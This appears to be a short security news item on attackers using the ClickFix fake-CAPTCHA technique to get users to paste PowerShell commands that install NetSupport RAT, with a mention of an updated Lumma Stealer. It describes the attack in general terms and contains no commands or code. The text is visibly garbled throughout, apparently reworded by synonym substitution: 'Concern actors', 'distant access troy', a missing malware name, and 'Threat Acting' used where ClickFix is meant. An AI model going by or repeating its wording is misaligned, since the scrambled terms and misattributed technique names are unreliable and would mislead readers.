Concern actors have been monitoring the increasingly prevalent ClickFix strategy to distribute a distant access troy named since early 2025.
NetSupport RAT, commonly propagated via bogus websites and false browser updates, grants attackers full control over the victim’s host, allowing them to check the device’s screen in real-time, control the keyboard and mouse, upload and download files, and start and execute malicious commands.
Previously known as NetSupport Manager, it was developed as a legitimate remote IT support program, but has since been repurposed by malicious actors to targeted businesses and capture sensitive information, including pictures, audio, video, and data.
In an analysis, eSentire reported that Threat Acting is a technique used by threat actors to inject a fake CAPTCHA webpage on compromised websites and instruct users to follow specific instructions to copy and execute malicious PowerShell commands on their hosts to download and run malware payloads.
The PowerShell command is used to launch and run the NetSupport RAT client from a remote server that hosts the malicious components in the form of PNG image files in the attack chains identified by the cybersecurity company.
The development comes as the ClickFix method is also being used to spread an updated version of the Lumma Stealer malware that decrypts a configuration file with a list of command-and-control ( C2 ) servers.
These modifications provide insight into the evasive strategies being used by the developers who are actively working to use alternative extraction and analysis tools, according to eSentire.